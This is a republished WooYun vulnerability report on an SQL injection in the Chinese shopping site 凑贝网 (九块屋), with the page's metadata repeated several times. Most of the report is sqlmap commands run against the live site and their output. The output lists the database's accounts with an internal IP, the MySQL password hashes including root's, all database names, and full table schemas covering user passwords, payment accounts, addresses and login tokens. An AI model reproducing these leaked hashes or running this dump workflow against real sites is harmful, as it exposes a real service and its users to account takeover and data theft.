凑贝网（九块屋）一处sql注入漏洞

admin

139544
文章

114
评论

2017年4月28日06:32:55评论303 views字数 211阅读0分42秒阅读模式

摘要

2016-03-07：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-04-21：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(2) 关注此漏洞

缺陷编号： WooYun-2016-181709

漏洞标题：凑贝网（九块屋）一处sql注入漏洞

漏洞作者： @空空

提交时间： 2016-03-07 08:25

公开时间： 2016-04-21 08:25

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

2016-03-07：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-04-21：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

地址http:m'

处存在注入

code 区域

可列出数据库管理系统用户名及密码
 sqlmap -u "http:m' --users
 database management system users [10]:
 [*] 'coubei.com'@'localhost'
 [*] 'robot'@'182.140.221.239'
 [*] 'root'@'127.0.0.1'
 [*] 'root'@'::1'
 [*] 'root'@'iz23npqfiaoz'
 [*] 'root'@'localhost'
 [*] 'root'@'localhost.localdomain'
 [*] 's_pikiw'@'localhost'
 [*] 'taobaoke.com'@'localhost'
 [*] 'wangyue.cc'@'localhost'
 
 sqlmap -u "http:m' --password
 
 database management system users password hashes:
 [*] coubei.com [1]:
     password hash: *0F4E8859665EB9351FCD26BA5E521560D811F3E8
 [*] robot [1]:
     password hash: *4109138D13D4BF720EB156E3D0E1E4F3EB089E0B
 [*] root [3]:
     password hash: *0B7843BA4FC68D716B10CED41B8DB4E1680C07B7
     password hash: *4109138D13D4BF720EB156E3D0E1E4F3EB089E0B
     password hash: *D2E399D1ED03AC4CAA4057C23D6EB3F5BF06646B
 [*] s_pikiw [1]:
     password hash: *4109138D13D4BF720EB156E3D0E1E4F3EB089E0B
 [*] taobaoke.com [1]:
     password hash: *3A7D3E1A95D13DABB7534F822CDF8F1600D0359D
 [*] wangyue.cc [1]:
     password hash: *C1176ED1BE0DA5D462FEC3E41B6EECB4535195C0
 
 
 sqlmap列数据库名可得以下数据
 sqlmap -u "http:m' --dbs
 available databases [18]:
 [*] _jiukuaiwu
 [*] apply
 [*] coubei
 [*] coubei_apply
 [*] coubei_coubei
 [*] coubei_goods
 [*] coubei_jiukuaiwu
 [*] coubei_users
 [*] cuzhe
 [*] information_schema
 [*] mysql
 [*] performance_schema
 [*] t1
 [*] t2
 [*] t5
 [*] taoniupindb
 [*] test
 [*] tmp
 列表名：sqlmap -u "http:m' -D coubei_users --tables
 Database: coubei_users
 [48 tables]
 +-----------------------------+
 | pre_adboard                 |
 | pre_app_ad                  |
 | pre_app_catad               |
 | pre_app_channel             |
 | pre_auction_bid             |
 | pre_auction_detail          |
 | pre_auction_list            |
 | pre_cash_detail             |
 | pre_cash_info               |
 | pre_cash_list               |
 | pre_common_pm               |
 | pre_email_tpl               |
 | pre_gift_send               |
 | pre_lottery_detail          |
 | pre_lottery_info            |
 | pre_lottery_list            |
 | pre_lottery_rule            |
 | pre_opinion                 |
 | pre_sms_tpl                 |
 | pre_task                    |
 | pre_task_log                |
 | pre_task_rule               |
 | pre_trial_apply             |
 | pre_trial_list              |
 | pre_trial_report            |
 | pre_trial_report_img        |
 | pre_trial_rule              |
 | pre_users                   |
 | pre_users_address           |
 | pre_users_center            |
 | pre_users_code              |
 | pre_users_code1             |
 | pre_users_comment           |
 | pre_users_favs              |
 | pre_users_field             |
 | pre_users_integrallog       |
 | pre_users_integrallog_field |
 | pre_users_invite            |
 | pre_users_pm                |
 | pre_users_purview           |
 | pre_users_session           |
 | pre_users_token             |
 | pre_users_tokentmp          |
 | pre_webset                  |
 | pre_worth_like              |
 | pre_zhuanbao_goods          |
 | pre_zhuanbao_info           |
 | pre_zhuanbao_log            |
 +-----------------------------+
 sqlmap -u "http:m' -D coubei_users -tables pre_users --columns
 Database: coubei_users
 Table: pre_lottery_list
 [17 columns]
 +-------------+----------------------+
 | Column      | Type                 |
 +-------------+----------------------+
 | addtime     | int(10) unsigned     |
 | app_only    | tinyint(1) unsigned  |
 | begintime   | int(10) unsigned     |
 | category_id | int(10) unsigned     |
 | endtime     | int(10) unsigned     |
 | id          | int(10) unsigned     |
 | image       | varchar(200)         |
 | integral    | smallint(6) unsigned |
 | is_open     | tinyint(3) unsigned  |
 | join_num    | int(10) unsigned     |
 | limit_join  | int(10) unsigned     |
 | lottery_num | int(10) unsigned     |
 | price       | decimal(9,2)         |
 | title       | char(50)             |
 | upimg       | varchar(200)         |
 | urlid       | bigint(11) unsigned  |
 | winning_num | tinyint(3) unsigned  |
 +-------------+----------------------+
 
 Database: coubei_users
 Table: pre_lottery_detail
 [3 columns]
 +------------+------------------+
 | Column     | Type             |
 +------------+------------------+
 | content    | mediumtext       |
 | detail_id  | int(10) unsigned |
 | lottery_id | int(10) unsigned |
 +------------+------------------+
 
 Database: coubei_users
 Table: pre_trial_report
 [7 columns]
 +-----------+----------------------------------------------------+
 | Column    | Type                                               |
 +-----------+----------------------------------------------------+
 | time      | int(10) unsigned                                   |
 | content   | varchar(255)                                       |
 | imgurl    | text                                               |
 | list_id   | int(10) unsigned                                   |
 | report_id | int(10) unsigned                                   |
 | type      | set('cash','lottery','auction','trial','zhuanbao') |
 | user_id   | int(10) unsigned                                   |
 +-----------+----------------------------------------------------+
 
 Database: coubei_users
 Table: pre_lottery_info
 [13 columns]
 +------------+---------------------+
 | Column     | Type                |
 +------------+---------------------+
 | time       | int(10) unsigned    |
 | agent      | varchar(255)        |
 | info_id    | int(10) unsigned    |
 | is_gain    | enum('1','0')       |
 | is_report  | enum('1','0')       |
 | is_send    | enum('1','0')       |
 | lottery_id | int(10) unsigned    |
 | number     | int(10) unsigned    |
 | payfor_err | tinyint(1) unsigned |
 | title      | char(50)            |
 | user_id    | int(10) unsigned    |
 | user_name  | char(20)            |
 | win        | tinyint(3) unsigned |
 +------------+---------------------+
 
 Database: coubei_users
 Table: pre_cash_detail
 [3 columns]
 +-----------+------------------+
 | Column    | Type             |
 +-----------+------------------+
 | content   | mediumtext       |
 | detail_id | int(10) unsigned |
 | list_id   | int(10) unsigned |
 +-----------+------------------+
 
 Database: coubei_users
 Table: pre_users_integrallog
 [6 columns]
 +-----------+----------------------+
 | Column    | Type                 |
 +-----------+----------------------+
 | addtime   | int(10)              |
 | logid     | int(10) unsigned     |
 | relatedid | int(10) unsigned     |
 | reward    | int(10)              |
 | type      | smallint(3) unsigned |
 | uid       | int(10) unsigned     |
 +-----------+----------------------+
 
 Database: coubei_users
 Table: pre_task
 [8 columns]
 +-----------+-----------------------+
 | Column    | Type                  |
 +-----------+-----------------------+
 | achievers | mediumint(8) unsigned |
 | available | tinyint(1)            |
 | icon      | varchar(150)          |
 | name      | varchar(50)           |
 | sort      | smallint(4)           |
 | task      | char(15)              |
 | type      | smallint(3)           |
 | url       | varchar(255)          |
 +-----------+-----------------------+
 
 Database: coubei_users
 Table: pre_auction_bid
 [13 columns]
 +------------+------------------+
 | Column     | Type             |
 +------------+------------------+
 | time       | int(10) unsigned |
 | agent      | varchar(255)     |
 | bid        | int(10) unsigned |
 | id         | int(10) unsigned |
 | is_gain    | enum('1','0')    |
 | is_report  | enum('1','0')    |
 | is_send    | enum('1','0')    |
 | is_win     | enum('1','0')    |
 | list_id    | int(10) unsigned |
 | list_title | char(50)         |
 | payfor_err | tinyint(1)       |
 | user_id    | int(10) unsigned |
 | user_name  | char(30)         |
 +------------+------------------+
 
 Database: coubei_users
 Table: pre_auction_detail
 [3 columns]
 +-----------+------------------+
 | Column    | Type             |
 +-----------+------------------+
 | content   | mediumtext       |
 | detail_id | int(10) unsigned |
 | list_id   | int(10) unsigned |
 +-----------+------------------+
 
 Database: coubei_users
 Table: pre_app_catad
 [6 columns]
 +----------+------------------+
 | Column   | Type             |
 +----------+------------------+
 | cat_id   | int(10) unsigned |
 | cat_name | char(20)         |
 | id       | int(10) unsigned |
 | img      | varchar(255)     |
 | title    | char(40)         |
 | url      | varchar(255)     |
 +----------+------------------+
 
 Database: coubei_users
 Table: pre_users_code1
 [4 columns]
 +---------+--------------+
 | Column  | Type         |
 +---------+--------------+
 | addtime | int(10)      |
 | code    | mediumint(6) |
 | mobile  | char(40)     |
 | type    | tinyint(1)   |
 +---------+--------------+
 
 Database: coubei_users
 Table: pre_trial_rule
 [4 columns]
 +--------+------------------+
 | Column | Type             |
 +--------+------------------+
 | rid    | int(10) unsigned |
 | rtitle | char(50)         |
 | rule   | text             |
 | step   | text             |
 +--------+------------------+
 
 Database: coubei_users
 Table: pre_zhuanbao_goods
 [18 columns]
 +-------------+------------------------+
 | Column      | Type                   |
 +-------------+------------------------+
 | end         | int(10) unsigned       |
 | time        | int(10) unsigned       |
 | attr        | varchar(200)           |
 | cat         | int(10) unsigned       |
 | content     | varchar(1000)          |
 | id          | int(10) unsigned       |
 | in_num      | int(10) unsigned       |
 | index_pic   | varchar(200)           |
 | invite_num  | int(10) unsigned       |
 | isapp       | tinyint(3) unsigned    |
 | num         | int(10) unsigned       |
 | pic         | varchar(200)           |
 | price       | decimal(10,2) unsigned |
 | start       | int(10) unsigned       |
 | surplus_num | int(10) unsigned       |
 | task        | varchar(1000)          |
 | title       | varchar(50)            |
 | url         | varchar(200)           |
 +-------------+------------------------+
 
 Database: coubei_users
 Table: pre_trial_apply
 [10 columns]
 +-----------+------------------+
 | Column    | Type             |
 +-----------+------------------+
 | order     | varchar(255)     |
 | addtime   | int(10) unsigned |
 | id        | int(10) unsigned |
 | is_report | enum('1','0')    |
 | is_rmoney | enum('1','0')    |
 | is_win    | enum('1','0')    |
 | list_id   | int(10) unsigned |
 | title     | char(50)         |
 | user_id   | int(10) unsigned |
 | user_name | char(20)         |
 +-----------+------------------+
 
 Database: coubei_users
 Table: pre_zhuanbao_log
 [5 columns]
 +------------+------------------+
 | Column     | Type             |
 +------------+------------------+
 | addtime    | int(10) unsigned |
 | goods_id   | int(10) unsigned |
 | id         | int(10) unsigned |
 | invite_uid | int(10) unsigned |
 | uid        | int(10) unsigned |
 +------------+------------------+
 
 Database: coubei_users
 Table: pre_cash_info
 [12 columns]
 +------------+---------------------+
 | Column     | Type                |
 +------------+---------------------+
 | time       | int(10) unsigned    |
 | agent      | varchar(255)        |
 | id         | int(10) unsigned    |
 | is_report  | enum('1','0')       |
 | is_send    | enum('1','0')       |
 | is_success | enum('1','0')       |
 | list_id    | int(10) unsigned    |
 | list_title | char(50)            |
 | payfor_err | tinyint(1) unsigned |
 | shop_attr  | varchar(255)        |
 | user_id    | int(10) unsigned    |
 | user_name  | char(30)            |
 +------------+---------------------+
 
 Database: coubei_users
 Table: pre_worth_like
 [3 columns]
 +--------+------------------+
 | Column | Type             |
 +--------+------------------+
 | id     | int(11)          |
 | uid    | int(10) unsigned |
 | wid    | int(10) unsigned |
 +--------+------------------+
 
 Database: coubei_users
 Table: pre_users_integrallog_field
 [3 columns]
 +--------+-----------------------+
 | Column | Type                  |
 +--------+-----------------------+
 | logid  | mediumint(8) unsigned |
 | text   | text                  |
 | title  | varchar(255)          |
 +--------+-----------------------+
 
 Database: coubei_users
 Table: pre_users_favs
 [3 columns]
 +---------+------------------+
 | Column  | Type             |
 +---------+------------------+
 | addtime | int(10) unsigned |
 | gid     | int(10) unsigned |
 | uid     | int(10) unsigned |
 +---------+------------------+
 
 Database: coubei_users
 Table: pre_app_channel
 [7 columns]
 +--------+-------------------------------------------+
 | Column | Type                                      |
 +--------+-------------------------------------------+
 | data   | varchar(255)                              |
 | home   | tinyint(1)                                |
 | img    | varchar(255)                              |
 | nid    | smallint(3)                               |
 | sort   | smallint(3)                               |
 | title  | char(20)                                  |
 | type   | enum('goods','tomorrow','brands','album') |
 +--------+-------------------------------------------+
 
 Database: coubei_users
 Table: pre_task_rule
 [3 columns]
 +----------+----------+
 | Column   | Type     |
 +----------+----------+
 | rule     | text     |
 | task     | char(15) |
 | variable | text     |
 +----------+----------+
 
 Database: coubei_users
 Table: pre_trial_report_img
 [3 columns]
 +-----------+------------------+
 | Column    | Type             |
 +-----------+------------------+
 | img_id    | int(10) unsigned |
 | imgurl    | varchar(200)     |
 | report_id | int(10) unsigned |
 +-----------+------------------+
 
 Database: coubei_users
 Table: pre_users_field
 [12 columns]
 +----------------+-------------+
 | Column         | Type        |
 +----------------+-------------+
 | alipay         | char(50)    |
 | alipay_name    | char(20)    |
 | birthday_day   | tinyint(2)  |
 | birthday_month | tinyint(2)  |
 | birthday_year  | smallint(4) |
 | qq             | bigint(11)  |
 | residcounty    | varchar(30) |
 | residecity     | varchar(15) |
 | resideprovince | varchar(15) |
 | sex            | tinyint(1)  |
 | truename       | char(6)     |
 | uid            | int(10)     |
 +----------------+-------------+
 
 Database: coubei_users
 Table: pre_cash_list
 [15 columns]
 +-------------+----------------------+
 | Column      | Type                 |
 +-------------+----------------------+
 | addtime     | int(10) unsigned     |
 | app_only    | tinyint(1) unsigned  |
 | attr        | varchar(255)         |
 | begintime   | int(10) unsigned     |
 | cash_num    | smallint(5) unsigned |
 | category_id | int(10) unsigned     |
 | id          | int(10) unsigned     |
 | image       | varchar(200)         |
 | integral    | smallint(6) unsigned |
 | overtime    | int(10) unsigned     |
 | price       | decimal(9,2)         |
 | shop_num    | smallint(5) unsigned |
 | title       | char(50)             |
 | upimg       | varchar(200)         |
 | urlid       | bigint(11) unsigned  |
 +-------------+----------------------+
 
 Database: coubei_users
 Table: pre_users_pm
 [4 columns]
 +---------+-----------------------+
 | Column  | Type                  |
 +---------+-----------------------+
 | addtime | int(10)               |
 | pmid    | smallint(6) unsigned  |
 | status  | tinyint(1)            |
 | uid     | mediumint(8) unsigned |
 +---------+-----------------------+
 
 Database: coubei_users
 Table: pre_users_address
 [10 columns]
 +----------+--------------+
 | Column   | Type         |
 +----------+--------------+
 | address  | varchar(255) |
 | aid      | int(10)      |
 | city     | varchar(15)  |
 | county   | varchar(30)  |
 | def      | tinyint(1)   |
 | mobile   | char(11)     |
 | province | varchar(15)  |
 | truename | char(15)     |
 | uid      | int(10)      |
 | zipcode  | mediumint(6) |
 +----------+--------------+
 
 Database: coubei_users
 Table: pre_gift_send
 [9 columns]
 +---------+----------------------------------------------------+
 | Column  | Type                                               |
 +---------+----------------------------------------------------+
 | time    | int(10) unsigned                                   |
 | address | varchar(255)                                       |
 | id      | int(10) unsigned                                   |
 | info_id | int(10) unsigned                                   |
 | name    | char(30)                                           |
 | phone   | char(20)                                           |
 | type    | set('cash','trial','auction','lottery','zhuanbao') |
 | user_id | int(10) unsigned                                   |
 | waybill | varchar(255)                                       |
 +---------+----------------------------------------------------+
 
 Database: coubei_users
 Table: pre_users_session
 [19 columns]
 +--------------+----------------------+
 | Column       | Type                 |
 +--------------+----------------------+
 | avatarstatus | tinyint(1)           |
 | email        | char(40)             |
 | email_check  | tinyint(1)           |
 | fieldstatus  | tinyint(1)           |
 | groups       | varchar(30)          |
 | integral     | mediumint(6)         |
 | invite       | smallint(6) unsigned |
 | lastactivity | int(10)              |
 | lastsigntime | int(10) unsigned     |
 | mobile       | char(11)             |
 | mobile_check | tinyint(1)           |
 | newpm        | smallint(6) unsigned |
 | pools        | char(10)             |
 | pwdlevel     | tinyint(1) unsigned  |
 | regip        | char(15)             |
 | regtime      | int(10)              |
 | signdays     | smallint(6) unsigned |
 | uid          | int(10)              |
 | user_name    | char(15)             |
 +--------------+----------------------+
 
 Database: coubei_users
 Table: pre_users_purview
 [2 columns]
 +----------+---------+
 | Column   | Type    |
 +----------+---------+
 | purviews | text    |
 | uid      | int(11) |
 +----------+---------+
 
 Database: coubei_users
 Table: pre_sms_tpl
 [4 columns]
 +--------+----------------------------------+
 | Column | Type                             |
 +--------+----------------------------------+
 | body   | text                             |
 | name   | varchar(255)                     |
 | type   | enum('register','bind','forget') |
 | var    | text                             |
 +--------+----------------------------------+
 
 Database: coubei_users
 Table: pre_users_center
 [4 columns]
 +--------+--------------+
 | Column | Type         |
 +--------+--------------+
 | appid  | smallint(3)  |
 | name   | varchar(255) |
 | token  | char(32)     |
 | url    | varchar(255) |
 +--------+--------------+
 
 Database: coubei_users
 Table: pre_common_pm
 [6 columns]
 +----------+-----------------------+
 | Column   | Type                  |
 +----------+-----------------------+
 | addtime  | int(10)               |
 | author   | varchar(15)           |
 | authorid | mediumint(8) unsigned |
 | id       | smallint(6) unsigned  |
 | message  | text                  |
 | numbers  | mediumint(8)          |
 +----------+-----------------------+
 
 Database: coubei_users
 Table: pre_email_tpl
 [5 columns]
 +--------+----------------------------------+
 | Column | Type                             |
 +--------+----------------------------------+
 | body   | text                             |
 | name   | varchar(255)                     |
 | title  | varchar(255)                     |
 | type   | enum('register','bind','forget') |
 | var    | text                             |
 +--------+----------------------------------+
 
 Database: coubei_users
 Table: pre_task_log
 [3 columns]
 +---------+----------+
 | Column  | Type     |
 +---------+----------+
 | addtime | int(10)  |
 | task    | char(15) |
 | uid     | int(10)  |
 +---------+----------+
 
 Database: coubei_users
 Table: pre_users_token
 [6 columns]
 +--------+-------------------------------------+
 | Column | Type                                |
 +--------+-------------------------------------+
 | api    | enum('taobao','qq','sina','weixin') |
 | apiuid | varchar(32)                         |
 | hash   | char(32)                            |
 | name   | varchar(70)                         |
 | token  | char(32)                            |
 | uid    | int(10)                             |
 +--------+-------------------------------------+
 
 Database: coubei_users
 Table: pre_webset
 [2 columns]
 +--------+-------------+
 | Column | Type        |
 +--------+-------------+
 | key    | varchar(50) |
 | val    | text        |
 +--------+-------------+
 
 Database: coubei_users
 Table: pre_trial_list
 [21 columns]
 +--------------+-----------------------+
 | Column       | Type                  |
 +--------------+-----------------------+
 | addtime      | int(10) unsigned      |
 | begintime    | int(10) unsigned      |
 | category_cid | int(10) unsigned      |
 | current_join | smallint(5) unsigned  |
 | get_shop     | tinyint(3) unsigned   |
 | id           | int(10) unsigned      |
 | intro        | varchar(255)          |
 | limit_join   | smallint(5) unsigned  |
 | margin       | decimal(7,2) unsigned |
 | overtime     | int(10) unsigned      |
 | payfor       | decimal(9,2)          |
 | postage      | decimal(9,2)          |
 | price        | decimal(9,2)          |
 | qualify      | tinyint(3) unsigned   |
 | rule_rid     | int(10) unsigned      |
 | tbimg        | varchar(200)          |
 | title        | char(50)              |
 | trial_num    | tinyint(3) unsigned   |
 | upimg        | varchar(200)          |
 | urlid        | bigint(11) unsigned   |
 | want         | varchar(50)           |
 +--------------+-----------------------+
 
 Database: coubei_users
 Table: pre_zhuanbao_info
 [13 columns]
 +------------+------------------+
 | Column     | Type             |
 +------------+------------------+
 | end        | int(10) unsigned |
 | addtime    | int(10) unsigned |
 | goods_id   | int(10) unsigned |
 | id         | int(10) unsigned |
 | invite_num | int(10) unsigned |
 | is_gain    | tinyint(4)       |
 | is_report  | tinyint(4)       |
 | is_send    | tinyint(4)       |
 | num        | int(10) unsigned |
 | property   | varchar(10)      |
 | status     | tinyint(4)       |
 | uid        | int(10) unsigned |
 | user_name  | varchar(30)      |
 +------------+------------------+
 
 Database: coubei_users
 Table: pre_users_code
 [4 columns]
 +---------+--------------+
 | Column  | Type         |
 +---------+--------------+
 | addtime | int(10)      |
 | code    | mediumint(6) |
 | mobile  | char(40)     |
 | type    | tinyint(1)   |
 +---------+--------------+
 
 Database: coubei_users
 Table: pre_app_ad
 [9 columns]
 +-----------+--------------+
 | Column    | Type         |
 +-----------+--------------+
 | position  | int(11)      |
 | appad_id  | int(11)      |
 | comment   | varchar(50)  |
 | data      | varchar(300) |
 | img       | varchar(255) |
 | index_img | varchar(255) |
 | sort      | int(11)      |
 | title     | varchar(30)  |
 | type      | varchar(20)  |
 +-----------+--------------+
 
 Database: coubei_users
 Table: pre_auction_list
 [15 columns]
 +----------------+-----------------------+
 | Column         | Type                  |
 +----------------+-----------------------+
 | addtime        | int(10) unsigned      |
 | aid            | int(10) unsigned      |
 | app_only       | tinyint(1) unsigned   |
 | begintime      | int(10) unsigned      |
 | category_id    | int(10) unsigned      |
 | image          | varchar(200)          |
 | is_over        | enum('1','0')         |
 | least_integral | int(10) unsigned      |
 | max_integral   | int(10) unsigned      |
 | overtime       | int(10) unsigned      |
 | price          | decimal(9,2) unsigned |
 | start_integral | int(10) unsigned      |
 | title          | char(50)              |
 | upimg          | varchar(200)          |
 | urlid          | bigint(11) unsigned   |
 +----------------+-----------------------+
 
 Database: coubei_users
 Table: pre_users_comment
 [2 columns]
 +--------+---------+
 | Column | Type    |
 +--------+---------+
 | cid    | int(10) |
 | uid    | int(10) |
 +--------+---------+
 
 Database: coubei_users
 Table: pre_lottery_rule
 [3 columns]
 +---------+------------------+
 | Column  | Type             |
 +---------+------------------+
 | content | text             |
 | id      | int(10) unsigned |
 | rule    | char(10)         |
 +---------+------------------+
 
 Database: coubei_users
 Table: pre_users_invite
 [4 columns]
 +---------+------------------+
 | Column  | Type             |
 +---------+------------------+
 | addtime | int(10)          |
 | toname  | char(15)         |
 | touid   | int(10) unsigned |
 | uid     | int(10) unsigned |
 +---------+------------------+
 
 Database: coubei_users
 Table: pre_opinion
 [10 columns]
 +------------+------------------+
 | Column     | Type             |
 +------------+------------------+
 | time       | int(10) unsigned |
 | contact    | varchar(100)     |
 | content    | varchar(255)     |
 | id         | int(10) unsigned |
 | imei       | varchar(64)      |
 | is_read    | enum('1','0')    |
 | os         | varchar(10)      |
 | reply      | varchar(255)     |
 | reply_time | int(11)          |
 | uid        | int(11)          |
 +------------+------------------+
 
 Database: coubei_users
 Table: pre_adboard
 [8 columns]
 +---------+--------------+
 | Column  | Type         |
 +---------+--------------+
 | addtime | int(11)      |
 | id      | int(11)      |
 | pic     | varchar(255) |
 | remark  | text         |
 | sort    | smallint(3)  |
 | title   | varchar(100) |
 | type    | tinyint(1)   |
 | url     | varchar(255) |
 +---------+--------------+
 
 Database: coubei_users
 Table: pre_users_tokentmp
 [6 columns]
 +---------+----------------------------+
 | Column  | Type                       |
 +---------+----------------------------+
 | addtime | int(10)                    |
 | api     | enum('taobao','qq','sina') |
 | apiuid  | varchar(32)                |
 | hash    | char(32)                   |
 | name    | varchar(70)                |
 | token   | char(32)                   |
 +---------+----------------------------+
 
 Database: coubei_users
 Table: pre_users
 [19 columns]
 +--------------+----------------------+
 | Column       | Type                 |
 +--------------+----------------------+
 | avatarstatus | tinyint(1)           |
 | email        | char(40)             |
 | email_check  | tinyint(1)           |
 | fieldstatus  | tinyint(1)           |
 | groups       | varchar(30)          |
 | integral     | mediumint(6)         |
 | invite       | smallint(6) unsigned |
 | lastsigntime | int(10) unsigned     |
 | mobile       | char(11)             |
 | mobile_check | tinyint(1)           |
 | newpm        | smallint(6) unsigned |
 | pools        | char(10)             |
 | pwdlevel     | tinyint(1) unsigned  |
 | regip        | char(15)             |
 | regtime      | int(10)              |
 | signdays     | smallint(6) unsigned |
 | uid          | int(10)              |
 | user_name    | char(15)             |
 | userpwd      | char(32)             |
 +--------------+----------------------+
 
 。。。。。。。。到此结束

漏洞证明：

同上

修复方案：

版权声明：转载请注明来源 @空空@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

凑贝网（九块屋）一处sql注入漏洞

漏洞概要关注数(2) 关注此漏洞

缺陷编号： WooYun-2016-181709

漏洞标题：凑贝网（九块屋）一处sql注入漏洞

相关厂商：凑贝网（九块屋）

漏洞作者： @空空

提交时间： 2016-03-07 08:25

公开时间： 2016-04-21 08:25

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 @空空@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(2) 关注此漏洞

缺陷编号： WooYun-2016-181709

漏洞标题： 凑贝网（九块屋）一处sql注入漏洞

相关厂商： 凑贝网（九块屋）

漏洞作者： @空空

提交时间： 2016-03-07 08:25

公开时间： 2016-04-21 08:25

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 @空空@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(2) 关注此漏洞

漏洞标题：凑贝网（九块屋）一处sql注入漏洞

相关厂商：凑贝网（九块屋）

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分